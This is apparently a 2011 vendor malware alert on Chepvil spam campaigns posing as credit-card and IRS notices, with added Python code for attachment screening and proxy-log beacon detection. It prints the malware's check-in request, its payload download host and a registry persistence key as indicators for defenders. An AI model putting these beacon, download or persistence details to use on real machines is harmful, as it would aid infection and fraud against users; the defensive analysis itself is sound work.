Fake Credit Card and IRS notices

June 30, 2011

The SonicWALL UTM Research team has observed two new spam campaigns in the past few days, each pretending to carry a notice from a credit card company or from the Internal Revenue Service (IRS). The e-mails carry the Downloader Trojan Chepvil as an attachment. Chepvil silently downloads and installs additional malware components or other malware, including Rogue AV. SonicWALL has received more than 100,000 copies of e-mails from these spam campaigns so far, delivering 74 unique malicious binaries, and the campaigns were still active at the time of writing this article.

Campaign #1 - Credit Card Overdue notice spam

Subject:

  • Credit Card Overdue

Attachment: Customer details.zip (contains Customer details.exe)

The e-mail message looks like below:

screenshot

Campaign #2 - IRS notification spam

Subject:

  • IRS notification

Attachment: IRS document.zip (contains IRS document.exe)

The e-mail message looks like below:

screenshot

The executable file inside the zip attachment uses an icon disguised as an Acrobat Reader PDF file:

screenshot
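The attachment in both campaigns is a zip archive whose only payload is a Windows executable dressed up with a PDF icon. The following added example (not code from the original alert or from SonicWALL) shows a mail-gateway style check: it opens an attachment in memory, flags archive entries that carry an executable extension, and also flags entries whose content starts with the PE "MZ" header even when the extension looks harmless. The sample archive and its contents are constructed here for the demonstration; the entry names mirror the attachment names quoted in the alert.

```python
import io
import zipfile

# Extensions that Windows runs directly when the user double-clicks the file.
EXECUTABLE_EXTENSIONS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd"}


def suspicious_entries(zip_bytes: bytes) -> list:
    """Return (entry name, reason) pairs for archive entries that look like
    executables, whether by extension, by content, or both."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename
            has_exe_ext = any(name.lower().endswith(ext) for ext in EXECUTABLE_EXTENSIONS)
            # Read only the first two bytes: a PE file starts with the "MZ" signature.
            with zf.open(info) as fh:
                head = fh.read(2)
            reasons = []
            if has_exe_ext:
                reasons.append("executable extension")
            if head == b"MZ":
                # An MZ header behind a document-style extension is the more
                # deceptive case, so it is called out separately.
                reasons.append("PE header (MZ)" if has_exe_ext
                               else "PE header (MZ) behind non-executable extension")
            if reasons:
                findings.append((name, ", ".join(reasons)))
    return findings


def build_sample_zip(entries: dict) -> bytes:
    """Build an in-memory zip from {name: bytes}; used only to construct test input."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


# Constructed sample: a fake PE (just the MZ signature plus padding), a benign
# text file, and a PE hiding behind a .pdf extension. Not real malware.
FAKE_PE = b"MZ" + b"\x00" * 62
SAMPLE_ATTACHMENT = build_sample_zip({
    "Customer details.exe": FAKE_PE,   # attachment name from campaign #1
    "readme.txt": b"plain text, nothing to see",
    "invoice.pdf": FAKE_PE,            # constructed: executable content, document name
})

if __name__ == "__main__":
    for name, reason in suspicious_entries(SAMPLE_ATTACHMENT):
        print(f"{name}: {reason}")
```

Checking the content signature as well as the extension matters because a filter that only looks at names is defeated by renaming the payload; a filter that only looks at content misses script-type droppers that have no MZ header, so both checks are kept.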

If the user downloads and executes the malicious executable inside the zip attachment, it performs the following activity:

  • Creates a process SVCHOST.EXE and injects code into it.
  • Deletes the original copy of the file.
  • Reports the infected machine by sending the following GET request:
    GET /404.php?type=stats&affid=531&subid=01&awok HTTP/1.1
    User-Agent: IE
    Host: click(REMOVED).org
  • Downloads a Fake AV Trojan from the remote server mysteryforyou1.ru to the following location and executes it:
    • (Application Data)\dRBAHQLTbF.exe - [ detected as GAV: FakeAV.PSL (Trojan) ]

  • The Fake AV Trojan periodically moves all of the user's programs into (TEMP)\smtmp(N) [where N = 1, 2, 3, ...], making them unavailable to the user, and also hides the user's files. The commands and features found during analysis are shown below:

    screenshot

    Languages supported:

    screenshot

    More details about this Fake AV Trojan's functionality can be found in one of our previous SonicALERTs: Fake Desktop Utilities on the rise (June 8, 2011)

  • Other dropped files include:
    • (TEMP)\trol.exe - [ detected as GAV: Agent.SEO (Trojan) ]
    • (TEMP)\javaw.exe - [ detected as GAV: Suspicious#polycrypt.4_2 (Worm) ]
  • Registry modification to ensure the Fake AV runs upon system reboot:
    • Key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Run
      Value: dRBAHQLTbF
      Data: (Application Data)\dRBAHQLTbF.exe
  • SonicWALL Gateway AntiVirus blocks the spammed Downloader Trojan Chepvil proactively via the following signature:

    • GAV: Suspicious#Chepvil.K (Trojan)

    screenshot
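The infection chain above leaves two network indicators a defender can hunt for in web-proxy logs: the check-in `GET /404.php?type=stats&affid=...&subid=...` sent with the bare User-Agent string `IE`, and the follow-up download from mysteryforyou1.ru. The added example below (not code from the original alert or from SonicWALL) runs those checks over a few constructed proxy log lines and lists the internal hosts that match. The log format (`timestamp client_ip method url "user-agent"`), the client IPs, the `click-REMOVED.example` hostname standing in for the redacted beacon host, and the download path are all constructed for the demonstration.

```python
import shlex
from urllib.parse import parse_qs, urlsplit

# Indicators taken from the alert: the check-in path and its query keys, the
# odd User-Agent, and the server that serves the Fake AV payload.
BEACON_PATH = "/404.php"
BEACON_KEYS = {"type", "affid", "subid"}
BEACON_USER_AGENT = "IE"
KNOWN_DOWNLOAD_HOSTS = {"mysteryforyou1.ru"}


def classify_request(line: str) -> tuple:
    """Parse one log line and return (client_ip, [reasons]); reasons is empty
    when nothing about the request matches the Chepvil indicators."""
    _timestamp, client_ip, _method, url, user_agent = shlex.split(line)
    parts = urlsplit(url)
    # keep_blank_values keeps the bare "awok" token instead of dropping it.
    query = parse_qs(parts.query, keep_blank_values=True)
    reasons = []
    if (parts.path == BEACON_PATH
            and BEACON_KEYS.issubset(query)
            and query.get("type") == ["stats"]):
        reasons.append("stats beacon")
    if user_agent == BEACON_USER_AGENT:
        reasons.append("bare 'IE' user-agent")
    if parts.hostname in KNOWN_DOWNLOAD_HOSTS:
        reasons.append("known download host")
    return client_ip, reasons


def find_beacons(log_text: str) -> list:
    """Return (client_ip, reasons) for every line with at least one match."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        client_ip, reasons = classify_request(line)
        if reasons:
            hits.append((client_ip, reasons))
    return hits


def infected_hosts(log_text: str) -> set:
    """Internal addresses that produced at least one matching request."""
    return {client_ip for client_ip, _reasons in find_beacons(log_text)}


# Constructed sample proxy log. Line 1 mirrors the check-in quoted in the alert
# (host redacted there, placeholder here); line 2 is a constructed payload
# download from the server named in the alert; lines 3-4 are benign noise.
SAMPLE_LOG = """\
2011-06-30T10:02:11Z 10.0.0.15 GET http://click-REMOVED.example/404.php?type=stats&affid=531&subid=01&awok "IE"
2011-06-30T10:02:12Z 10.0.0.15 GET http://mysteryforyou1.ru/PLACEHOLDER-PATH.exe "IE"
2011-06-30T10:03:40Z 10.0.0.22 GET http://www.example.com/404.php?type=stats "Mozilla/5.0"
2011-06-30T10:04:01Z 10.0.0.31 GET http://www.example.com/index.html "Mozilla/5.0"
"""

if __name__ == "__main__":
    for client_ip, reasons in find_beacons(SAMPLE_LOG):
        print(f"{client_ip}: {', '.join(reasons)}")
    print("hosts to isolate:", sorted(infected_hosts(SAMPLE_LOG)))
```

The beacon rule requires all three query keys plus `type=stats` rather than matching on `/404.php` alone, so an ordinary site's 404 handler (line 3 of the sample) is not flagged; the User-Agent rule is kept separate because a bare `IE` string is unusual enough to be worth a look even when the affiliate parameters change.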